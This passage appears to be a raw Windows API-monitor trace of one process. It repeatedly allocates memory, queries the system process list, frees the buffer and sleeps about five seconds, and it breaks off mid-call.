NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.999] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.118] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.138] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.197] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.310] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, 